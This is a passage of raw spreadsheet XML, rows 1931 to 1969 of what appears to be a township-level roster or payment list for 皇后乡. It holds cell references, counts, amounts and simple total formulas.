      </c>
      <c r="F1931" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1931" s="24">
        <v>1</v>
      </c>
      <c r="H1931" s="25">
        <v>365</v>
      </c>
      <c r="I1931" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1931" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1931" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1932" customHeight="1" spans="1:11">
      <c r="A1932" s="23" t="s">
        <v>5151</v>
      </c>
      <c r="B1932" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1932" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1932" s="24" t="s">
        <v>5152</v>
      </c>
      <c r="E1932" s="24" t="s">
        <v>5153</v>
      </c>
      <c r="F1932" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1932" s="24">
        <v>1</v>
      </c>
      <c r="H1932" s="25">
        <v>365</v>
      </c>
      <c r="I1932" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1932" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1932" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1933" customHeight="1" spans="1:11">
      <c r="A1933" s="23" t="s">
        <v>5154</v>
      </c>
      <c r="B1933" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1933" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1933" s="24" t="s">
        <v>5155</v>
      </c>
      <c r="E1933" s="24" t="s">
        <v>4838</v>
      </c>
      <c r="F1933" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1933" s="24">
        <v>1</v>
      </c>
      <c r="H1933" s="25">
        <v>365</v>
      </c>
      <c r="I1933" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1933" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1933" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1934" customHeight="1" spans="1:11">
      <c r="A1934" s="23" t="s">
        <v>5156</v>
      </c>
      <c r="B1934" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1934" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1934" s="24" t="s">
        <v>5157</v>
      </c>
      <c r="E1934" s="24" t="s">
        <v>4770</v>
      </c>
      <c r="F1934" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1934" s="24">
        <v>2</v>
      </c>
      <c r="H1934" s="25">
        <v>325</v>
      </c>
      <c r="I1934" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1934" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1934" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1935" customHeight="1" spans="1:11">
      <c r="A1935" s="23" t="s">
        <v>5158</v>
      </c>
      <c r="B1935" s="24" t="str">
        <f>B1934</f>
        <v>皇后乡</v>
      </c>
      <c r="C1935" s="24" t="str">
        <f>C1934</f>
        <v>皇后乡</v>
      </c>
      <c r="D1935" s="23" t="s">
        <v>5159</v>
      </c>
      <c r="E1935" s="23" t="s">
        <v>4914</v>
      </c>
      <c r="F1935" s="24" t="str">
        <f>F1934</f>
        <v>4113210615</v>
      </c>
      <c r="G1935" s="24"/>
      <c r="H1935" s="24"/>
      <c r="I1935" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1935" s="24"/>
      <c r="K1935" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1936" customHeight="1" spans="1:11">
      <c r="A1936" s="23" t="s">
        <v>5160</v>
      </c>
      <c r="B1936" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1936" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1936" s="24" t="s">
        <v>5161</v>
      </c>
      <c r="E1936" s="24" t="s">
        <v>4743</v>
      </c>
      <c r="F1936" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1936" s="24">
        <v>1</v>
      </c>
      <c r="H1936" s="25">
        <v>365</v>
      </c>
      <c r="I1936" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1936" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1936" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1937" customHeight="1" spans="1:11">
      <c r="A1937" s="23" t="s">
        <v>5162</v>
      </c>
      <c r="B1937" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1937" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1937" s="24" t="s">
        <v>5163</v>
      </c>
      <c r="E1937" s="24" t="s">
        <v>3776</v>
      </c>
      <c r="F1937" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1937" s="24">
        <v>2</v>
      </c>
      <c r="H1937" s="25">
        <v>325</v>
      </c>
      <c r="I1937" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1937" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1937" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1938" customHeight="1" spans="1:11">
      <c r="A1938" s="23" t="s">
        <v>5164</v>
      </c>
      <c r="B1938" s="24" t="str">
        <f>B1937</f>
        <v>皇后乡</v>
      </c>
      <c r="C1938" s="24" t="str">
        <f>C1937</f>
        <v>皇后乡</v>
      </c>
      <c r="D1938" s="23" t="s">
        <v>5165</v>
      </c>
      <c r="E1938" s="23" t="s">
        <v>5166</v>
      </c>
      <c r="F1938" s="24" t="str">
        <f>F1937</f>
        <v>4113210615</v>
      </c>
      <c r="G1938" s="24"/>
      <c r="H1938" s="24"/>
      <c r="I1938" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1938" s="24"/>
      <c r="K1938" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1939" customHeight="1" spans="1:11">
      <c r="A1939" s="23" t="s">
        <v>5167</v>
      </c>
      <c r="B1939" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1939" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1939" s="24" t="s">
        <v>5168</v>
      </c>
      <c r="E1939" s="24" t="s">
        <v>5169</v>
      </c>
      <c r="F1939" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1939" s="24">
        <v>1</v>
      </c>
      <c r="H1939" s="25">
        <v>365</v>
      </c>
      <c r="I1939" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1939" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1939" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1940" customHeight="1" spans="1:11">
      <c r="A1940" s="23" t="s">
        <v>5170</v>
      </c>
      <c r="B1940" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1940" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1940" s="24" t="s">
        <v>5171</v>
      </c>
      <c r="E1940" s="24" t="s">
        <v>4761</v>
      </c>
      <c r="F1940" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1940" s="24">
        <v>1</v>
      </c>
      <c r="H1940" s="25">
        <v>365</v>
      </c>
      <c r="I1940" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1940" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1940" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1941" customHeight="1" spans="1:11">
      <c r="A1941" s="23" t="s">
        <v>5172</v>
      </c>
      <c r="B1941" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1941" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1941" s="24" t="s">
        <v>5173</v>
      </c>
      <c r="E1941" s="24" t="s">
        <v>4797</v>
      </c>
      <c r="F1941" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1941" s="24">
        <v>2</v>
      </c>
      <c r="H1941" s="25">
        <v>325</v>
      </c>
      <c r="I1941" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1941" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1941" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1942" customHeight="1" spans="1:11">
      <c r="A1942" s="23" t="s">
        <v>5174</v>
      </c>
      <c r="B1942" s="24" t="str">
        <f>B1941</f>
        <v>皇后乡</v>
      </c>
      <c r="C1942" s="24" t="str">
        <f>C1941</f>
        <v>皇后乡</v>
      </c>
      <c r="D1942" s="23" t="s">
        <v>5175</v>
      </c>
      <c r="E1942" s="23" t="s">
        <v>5176</v>
      </c>
      <c r="F1942" s="24" t="str">
        <f>F1941</f>
        <v>4113210615</v>
      </c>
      <c r="G1942" s="24"/>
      <c r="H1942" s="24"/>
      <c r="I1942" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1942" s="24"/>
      <c r="K1942" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1943" customHeight="1" spans="1:11">
      <c r="A1943" s="23" t="s">
        <v>5177</v>
      </c>
      <c r="B1943" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1943" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1943" s="24" t="s">
        <v>5178</v>
      </c>
      <c r="E1943" s="24" t="s">
        <v>4778</v>
      </c>
      <c r="F1943" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1943" s="24">
        <v>2</v>
      </c>
      <c r="H1943" s="25">
        <v>325</v>
      </c>
      <c r="I1943" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1943" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1943" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1944" customHeight="1" spans="1:11">
      <c r="A1944" s="23" t="s">
        <v>5179</v>
      </c>
      <c r="B1944" s="24" t="str">
        <f>B1943</f>
        <v>皇后乡</v>
      </c>
      <c r="C1944" s="24" t="str">
        <f>C1943</f>
        <v>皇后乡</v>
      </c>
      <c r="D1944" s="23" t="s">
        <v>5180</v>
      </c>
      <c r="E1944" s="23" t="s">
        <v>5181</v>
      </c>
      <c r="F1944" s="24" t="str">
        <f>F1943</f>
        <v>4113210615</v>
      </c>
      <c r="G1944" s="24"/>
      <c r="H1944" s="24"/>
      <c r="I1944" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1944" s="24"/>
      <c r="K1944" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1945" customHeight="1" spans="1:11">
      <c r="A1945" s="23" t="s">
        <v>5182</v>
      </c>
      <c r="B1945" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1945" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1945" s="24" t="s">
        <v>5183</v>
      </c>
      <c r="E1945" s="24" t="s">
        <v>5184</v>
      </c>
      <c r="F1945" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1945" s="24">
        <v>1</v>
      </c>
      <c r="H1945" s="25">
        <v>365</v>
      </c>
      <c r="I1945" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1945" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1945" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1946" customHeight="1" spans="1:11">
      <c r="A1946" s="23" t="s">
        <v>5185</v>
      </c>
      <c r="B1946" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1946" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1946" s="24" t="s">
        <v>5186</v>
      </c>
      <c r="E1946" s="24" t="s">
        <v>5187</v>
      </c>
      <c r="F1946" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1946" s="24">
        <v>1</v>
      </c>
      <c r="H1946" s="25">
        <v>365</v>
      </c>
      <c r="I1946" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1946" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1946" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1947" customHeight="1" spans="1:11">
      <c r="A1947" s="23" t="s">
        <v>5188</v>
      </c>
      <c r="B1947" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1947" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1947" s="24" t="s">
        <v>5189</v>
      </c>
      <c r="E1947" s="24" t="s">
        <v>4758</v>
      </c>
      <c r="F1947" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1947" s="24">
        <v>2</v>
      </c>
      <c r="H1947" s="25">
        <v>325</v>
      </c>
      <c r="I1947" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1947" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1947" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1948" customHeight="1" spans="1:11">
      <c r="A1948" s="23" t="s">
        <v>5190</v>
      </c>
      <c r="B1948" s="24" t="str">
        <f>B1947</f>
        <v>皇后乡</v>
      </c>
      <c r="C1948" s="24" t="str">
        <f>C1947</f>
        <v>皇后乡</v>
      </c>
      <c r="D1948" s="31" t="s">
        <v>5191</v>
      </c>
      <c r="E1948" s="31" t="s">
        <v>5192</v>
      </c>
      <c r="F1948" s="24" t="str">
        <f>F1947</f>
        <v>4113210615</v>
      </c>
      <c r="G1948" s="24"/>
      <c r="H1948" s="24"/>
      <c r="I1948" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1948" s="24"/>
      <c r="K1948" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1949" customHeight="1" spans="1:11">
      <c r="A1949" s="23" t="s">
        <v>5193</v>
      </c>
      <c r="B1949" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1949" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1949" s="24" t="s">
        <v>5194</v>
      </c>
      <c r="E1949" s="24" t="s">
        <v>4850</v>
      </c>
      <c r="F1949" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1949" s="24">
        <v>2</v>
      </c>
      <c r="H1949" s="25">
        <v>325</v>
      </c>
      <c r="I1949" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1949" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1949" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1950" customHeight="1" spans="1:11">
      <c r="A1950" s="23" t="s">
        <v>5195</v>
      </c>
      <c r="B1950" s="24" t="str">
        <f>B1949</f>
        <v>皇后乡</v>
      </c>
      <c r="C1950" s="24" t="str">
        <f>C1949</f>
        <v>皇后乡</v>
      </c>
      <c r="D1950" s="31" t="s">
        <v>5196</v>
      </c>
      <c r="E1950" s="31" t="s">
        <v>5197</v>
      </c>
      <c r="F1950" s="24" t="str">
        <f>F1949</f>
        <v>4113210615</v>
      </c>
      <c r="G1950" s="24"/>
      <c r="H1950" s="24"/>
      <c r="I1950" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1950" s="24"/>
      <c r="K1950" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1951" customHeight="1" spans="1:11">
      <c r="A1951" s="23" t="s">
        <v>5198</v>
      </c>
      <c r="B1951" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1951" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1951" s="24" t="s">
        <v>5199</v>
      </c>
      <c r="E1951" s="24" t="s">
        <v>4844</v>
      </c>
      <c r="F1951" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1951" s="24">
        <v>1</v>
      </c>
      <c r="H1951" s="25">
        <v>365</v>
      </c>
      <c r="I1951" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1951" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1951" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1952" customHeight="1" spans="1:11">
      <c r="A1952" s="23" t="s">
        <v>5200</v>
      </c>
      <c r="B1952" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1952" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1952" s="24" t="s">
        <v>5201</v>
      </c>
      <c r="E1952" s="24" t="s">
        <v>5202</v>
      </c>
      <c r="F1952" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1952" s="24">
        <v>1</v>
      </c>
      <c r="H1952" s="25">
        <v>365</v>
      </c>
      <c r="I1952" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1952" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1952" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1953" customHeight="1" spans="1:11">
      <c r="A1953" s="23" t="s">
        <v>5203</v>
      </c>
      <c r="B1953" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1953" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1953" s="24" t="s">
        <v>5204</v>
      </c>
      <c r="E1953" s="24" t="s">
        <v>5205</v>
      </c>
      <c r="F1953" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1953" s="24">
        <v>1</v>
      </c>
      <c r="H1953" s="25">
        <v>365</v>
      </c>
      <c r="I1953" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1953" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1953" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1954" customHeight="1" spans="1:11">
      <c r="A1954" s="23" t="s">
        <v>5206</v>
      </c>
      <c r="B1954" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1954" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1954" s="24" t="s">
        <v>5207</v>
      </c>
      <c r="E1954" s="24" t="s">
        <v>4761</v>
      </c>
      <c r="F1954" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1954" s="24">
        <v>2</v>
      </c>
      <c r="H1954" s="25">
        <v>325</v>
      </c>
      <c r="I1954" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1954" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1954" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1955" customHeight="1" spans="1:11">
      <c r="A1955" s="23" t="s">
        <v>5208</v>
      </c>
      <c r="B1955" s="24" t="str">
        <f>B1954</f>
        <v>皇后乡</v>
      </c>
      <c r="C1955" s="24" t="str">
        <f>C1954</f>
        <v>皇后乡</v>
      </c>
      <c r="D1955" s="31" t="s">
        <v>5209</v>
      </c>
      <c r="E1955" s="31" t="s">
        <v>5210</v>
      </c>
      <c r="F1955" s="24" t="str">
        <f>F1954</f>
        <v>4113210615</v>
      </c>
      <c r="G1955" s="24"/>
      <c r="H1955" s="24"/>
      <c r="I1955" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1955" s="24"/>
      <c r="K1955" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1956" customHeight="1" spans="1:11">
      <c r="A1956" s="23" t="s">
        <v>5211</v>
      </c>
      <c r="B1956" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1956" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1956" s="24" t="s">
        <v>5212</v>
      </c>
      <c r="E1956" s="24" t="s">
        <v>4993</v>
      </c>
      <c r="F1956" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1956" s="24">
        <v>1</v>
      </c>
      <c r="H1956" s="25">
        <v>365</v>
      </c>
      <c r="I1956" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1956" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1956" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1957" customHeight="1" spans="1:11">
      <c r="A1957" s="23" t="s">
        <v>5213</v>
      </c>
      <c r="B1957" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1957" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1957" s="24" t="s">
        <v>5214</v>
      </c>
      <c r="E1957" s="24" t="s">
        <v>5215</v>
      </c>
      <c r="F1957" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1957" s="24">
        <v>1</v>
      </c>
      <c r="H1957" s="25">
        <v>365</v>
      </c>
      <c r="I1957" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1957" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1957" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1958" customHeight="1" spans="1:11">
      <c r="A1958" s="23" t="s">
        <v>5216</v>
      </c>
      <c r="B1958" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1958" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1958" s="24" t="s">
        <v>5217</v>
      </c>
      <c r="E1958" s="24" t="s">
        <v>4761</v>
      </c>
      <c r="F1958" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1958" s="24">
        <v>1</v>
      </c>
      <c r="H1958" s="25">
        <v>365</v>
      </c>
      <c r="I1958" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1958" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1958" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1959" customHeight="1" spans="1:11">
      <c r="A1959" s="23" t="s">
        <v>5218</v>
      </c>
      <c r="B1959" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1959" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1959" s="24" t="s">
        <v>5219</v>
      </c>
      <c r="E1959" s="24" t="s">
        <v>4880</v>
      </c>
      <c r="F1959" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1959" s="24">
        <v>2</v>
      </c>
      <c r="H1959" s="25">
        <v>325</v>
      </c>
      <c r="I1959" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1959" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1959" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1960" customHeight="1" spans="1:11">
      <c r="A1960" s="23" t="s">
        <v>5220</v>
      </c>
      <c r="B1960" s="24" t="str">
        <f>B1959</f>
        <v>皇后乡</v>
      </c>
      <c r="C1960" s="24" t="str">
        <f>C1959</f>
        <v>皇后乡</v>
      </c>
      <c r="D1960" s="23" t="s">
        <v>5221</v>
      </c>
      <c r="E1960" s="23" t="s">
        <v>5222</v>
      </c>
      <c r="F1960" s="24" t="str">
        <f>F1959</f>
        <v>4113210615</v>
      </c>
      <c r="G1960" s="24"/>
      <c r="H1960" s="24"/>
      <c r="I1960" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1960" s="24"/>
      <c r="K1960" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1961" customHeight="1" spans="1:11">
      <c r="A1961" s="23" t="s">
        <v>5223</v>
      </c>
      <c r="B1961" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1961" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1961" s="24" t="s">
        <v>5224</v>
      </c>
      <c r="E1961" s="24" t="s">
        <v>5225</v>
      </c>
      <c r="F1961" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1961" s="24">
        <v>2</v>
      </c>
      <c r="H1961" s="25">
        <v>345</v>
      </c>
      <c r="I1961" s="24">
        <f t="shared" si="30"/>
        <v>690</v>
      </c>
      <c r="J1961" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1961" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1962" customHeight="1" spans="1:11">
      <c r="A1962" s="23" t="s">
        <v>5226</v>
      </c>
      <c r="B1962" s="24" t="str">
        <f>B1961</f>
        <v>皇后乡</v>
      </c>
      <c r="C1962" s="24" t="str">
        <f>C1961</f>
        <v>皇后乡</v>
      </c>
      <c r="D1962" s="23" t="s">
        <v>5227</v>
      </c>
      <c r="E1962" s="24" t="s">
        <v>5228</v>
      </c>
      <c r="F1962" s="24" t="str">
        <f>F1961</f>
        <v>4113210615</v>
      </c>
      <c r="G1962" s="24"/>
      <c r="H1962" s="24"/>
      <c r="I1962" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1962" s="24"/>
      <c r="K1962" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1963" customHeight="1" spans="1:11">
      <c r="A1963" s="23" t="s">
        <v>5229</v>
      </c>
      <c r="B1963" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1963" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1963" s="24" t="s">
        <v>5230</v>
      </c>
      <c r="E1963" s="24" t="s">
        <v>4811</v>
      </c>
      <c r="F1963" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1963" s="24">
        <v>1</v>
      </c>
      <c r="H1963" s="25">
        <v>365</v>
      </c>
      <c r="I1963" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1963" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1963" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1964" customHeight="1" spans="1:11">
      <c r="A1964" s="23" t="s">
        <v>5231</v>
      </c>
      <c r="B1964" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1964" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1964" s="24" t="s">
        <v>5232</v>
      </c>
      <c r="E1964" s="24" t="s">
        <v>4488</v>
      </c>
      <c r="F1964" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1964" s="24">
        <v>2</v>
      </c>
      <c r="H1964" s="25">
        <v>345</v>
      </c>
      <c r="I1964" s="24">
        <f t="shared" si="30"/>
        <v>690</v>
      </c>
      <c r="J1964" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1964" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1965" customHeight="1" spans="1:11">
      <c r="A1965" s="23" t="s">
        <v>5233</v>
      </c>
      <c r="B1965" s="24" t="str">
        <f>B1964</f>
        <v>皇后乡</v>
      </c>
      <c r="C1965" s="24" t="str">
        <f>C1964</f>
        <v>皇后乡</v>
      </c>
      <c r="D1965" s="23" t="s">
        <v>5234</v>
      </c>
      <c r="E1965" s="24" t="s">
        <v>4746</v>
      </c>
      <c r="F1965" s="24" t="str">
        <f>F1964</f>
        <v>4113210615</v>
      </c>
      <c r="G1965" s="24"/>
      <c r="H1965" s="24"/>
      <c r="I1965" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1965" s="24"/>
      <c r="K1965" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1966" customHeight="1" spans="1:11">
      <c r="A1966" s="23" t="s">
        <v>5235</v>
      </c>
      <c r="B1966" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1966" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1966" s="24" t="s">
        <v>5236</v>
      </c>
      <c r="E1966" s="24" t="s">
        <v>5237</v>
      </c>
      <c r="F1966" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1966" s="24">
        <v>1</v>
      </c>
      <c r="H1966" s="25">
        <v>365</v>
      </c>
      <c r="I1966" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1966" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1966" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1967" customHeight="1" spans="1:11">
      <c r="A1967" s="23" t="s">
        <v>5238</v>
      </c>
      <c r="B1967" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1967" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1967" s="24" t="s">
        <v>5239</v>
      </c>
      <c r="E1967" s="24" t="s">
        <v>5240</v>
      </c>
      <c r="F1967" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1967" s="24">
        <v>1</v>
      </c>
      <c r="H1967" s="25">
        <v>365</v>
      </c>
      <c r="I1967" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1967" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1967" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1968" customHeight="1" spans="1:11">
      <c r="A1968" s="23" t="s">
        <v>5241</v>
      </c>
      <c r="B1968" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1968" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1968" s="24" t="s">
        <v>5242</v>
      </c>
      <c r="E1968" s="24" t="s">
        <v>5243</v>
      </c>
      <c r="F1968" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1968" s="24">
        <v>4</v>
      </c>
      <c r="H1968" s="25">
        <v>285</v>
      </c>
      <c r="I1968" s="24">
        <f t="shared" si="30"/>
        <v>1140</v>
      </c>
      <c r="J1968" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1968" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1969" customHeight="1" spans="1:11">
      <c r="A1969" s="23" t="s">
        <v>5244</v>
      </c>
      <c r="B1969" s="24" t="str">
        <f>B1968</f>
        <v>皇后乡</v>
      </c>
      <c r="C1969" s="24" t="str">
        <f>C1968</f>
        <v>皇后乡</v>
      </c>
      <c r="D1969" s="23" t="s">
        <v>5245</v>
      </c>
      <c r="E1969" s="24" t="s">
        <v>5246</v>
      </c>
      <c r="F1969" s="24" t="str">
        <f>F1968</f>
        <v>4113210615</v>
      </c>
      <c r="G1969" s="24"/>
      <c r="H1969" s="24"/>
      <c r="I1969" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1969" s="24"/>
      <c r="K1969" s="24" t="s">
        <v>225</v>
      </c>
    </row>
